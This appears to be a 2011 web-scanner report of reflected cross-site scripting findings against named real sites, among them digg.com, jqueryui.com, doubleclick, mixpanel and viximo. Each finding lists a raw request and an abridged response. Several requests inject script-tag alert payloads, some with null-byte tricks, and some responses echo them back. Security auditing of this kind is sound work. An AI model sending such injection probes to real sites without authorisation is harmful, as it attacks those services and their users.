GET /adi/N3285.google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4903 Date: Wed, 06 Jul 2011 11:55:52 GMT <html><head><title ...[SNIP]... GZpbGU6Ly8vRDovYWN1b var wmode = "opaque"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /adi/N3285.google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4922 Date: Wed, 06 Jul 2011 11:56:01 GMT <html><head><title ...[SNIP]... ZXBvcnRzL2FkZHRoaXNj var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /adi/N3285.google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4903 Date: Wed, 06 Jul 2011 11:55:33 GMT <html><head><title ...[SNIP]... url = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adonmax.com |
Path: | /afr.php |
GET /afr.php?campaignid Accept: text/html, application/xhtml+xml, */* Referer: http://pubads.g Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: adonmax.com Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Wed, 06 Jul 2011 14:19:37 GMT Server: Apache/2.2.19 (CentOS) X-Powered-By: PHP/5.2.17 Content-Length: 384 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /afr.php?campaignid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adonmax.com |
Path: | /afr.php |
GET /afr.php?campaignid Accept: text/html, application/xhtml+xml, */* Referer: http://pubads.g Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: adonmax.com Proxy-Connection: Keep-Alive |
HTTP/1.0 404 Not Found Date: Wed, 06 Jul 2011 14:19:38 GMT Server: Apache/2.2.19 (CentOS) X-Powered-By: PHP/5.2.17 Content-Length: 387 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /afr.php?campaignid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adonmax.com |
Path: | /favicon.ico |
GET /favicon.ico2267d<script>alert(1)< Host: adonmax.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 404 Not Found Date: Wed, 06 Jul 2011 14:27:41 GMT Server: Apache/2.2.19 (CentOS) X-Powered-By: PHP/5.2.17 Content-Length: 327 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico2267d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.mixpanel.com |
Path: | /track/ |
GET /track/?data=eyJldmV Host: api.mixpanel.com Proxy-Connection: keep-alive Referer: http://www.bebo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Wed, 06 Jul 2011 11:22:11 GMT Content-Type: text/javascript Connection: close Vary: Accept-Encoding Expires: Wed, 06 Jul 2011 11:22:10 GMT Access-Control-Max-Age: 1728000 Access-Control-Allow Access-Control-Allow Access-Control-Allow Content-Length: 68 mpmetrics.jsonp_callbackf560e<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://api.viximo.com |
Path: | /api/v3/publishers/bebo |
GET /api/v3/publishers/bebo Host: api.viximo.com Proxy-Connection: keep-alive Referer: http://www.bebo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private, max-age=0, must-revalidate Content-Type: application/json; charset=utf-8 Date: Wed, 06 Jul 2011 11:22:29 GMT ETag: "71f99547f2ad6ad86b6 Server: nginx/0.7.65 Status: 200 OK Vary: Accept-Encoding X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.00955 Content-Length: 15840 Connection: keep-alive viximo.publisherLoadedf5abb<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://blog.metricstream |
Path: | / |
GET /?b953d'><script>alert(1)< Host: blog.metricstream.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _mkto_trk=id:404-BGD-511 |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 13:46:54 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 X-Pingback: https://blog.metricstream Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32430 <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title> <!-- feeds --> <link rel=" ...[SNIP]... <a href='https://blog ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdnt.meteorso |
Path: | /api/ie8_email |
GET /api/ie8_email?url Host: cdnt.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://www.beautyoftheweb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=85865477 |
HTTP/1.1 200 OK Server: meteor/1.0 Date: Wed, 06 Jul 2011 15:39:15 GMT Content-Type: application/javascript Connection: close Content-Length: 176 Etag: "169d3f95eedfc376e2b meteor.json_query |
Severity: | High |
Confidence: | Certain |
Host: | http://cdnt.meteorso |
Path: | /api/ie8_email |
GET /api/ie8_email?url Host: cdnt.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://www.beautyoftheweb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=85865477 |
HTTP/1.1 200 OK Server: meteor/1.0 Date: Wed, 06 Jul 2011 15:39:25 GMT Content-Type: application/javascript Connection: close Content-Length: 176 Etag: "fb0e3943f6866607c9d meteor.json_query |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | / |
GET /?a2cec"><script>alert(1)< Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:18 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: imp_id=2ca757a04da66 X-Digg-Time: D=251801 10.2.128.190 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 101254 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - All Topics - The Latest News Headlines, Videos and Images </title> <met ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /ajax/submit/crawl |
GET /ajax%00186dc"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:16 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=408863 10.2.130.26 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18136 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /ajax/submit/crawl |
GET /ajax/submit%002ad4b"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:18 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=280116 10.2.128.190 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18137 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /ajax/submit/crawl |
GET /ajax/submit/crawl%0019fdd"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:21 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=212072 10.2.128.108 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18123 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /login |
GET /login%00d5183"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:12 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=217960 10.2.129.155 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18113 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /register |
GET /register%00c0388"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:12 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=275292 10.2.130.111 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18119 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /search |
GET /search%005a216"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:15 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=205025 10.2.129.90 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18107 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /submit |
GET /submit%0034ebf"><script>alert(1 Host: digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:16:21 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=281051 10.2.129.97 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 18272 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /topic |
GET /topic%006361e"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:13 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=220732 10.2.130.26 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18112 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /upcoming |
GET /upcoming%00d52d9"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 06 Jul 2011 11:37:20 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=193751 10.2.130.26 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 18118 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... &fcDefault=000000 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... l&fsDefault=1.1em ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... fcHeader=222222 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... 0000&iconColorActive ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ver=000000&iconColorHover ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ffffff&iconColorContent ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... fcHighlight=363636 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... oft.png&bgImgOpacityError ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... a&bgTextureHover=04 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ada&bgTextureHeader=03 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... gTextureContent=01_flat ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... TextureHighlight=02_glass ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... /parseTheme.css.php?ctl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... extureActive=04_highlight ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... tureDefault=04_highlight ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
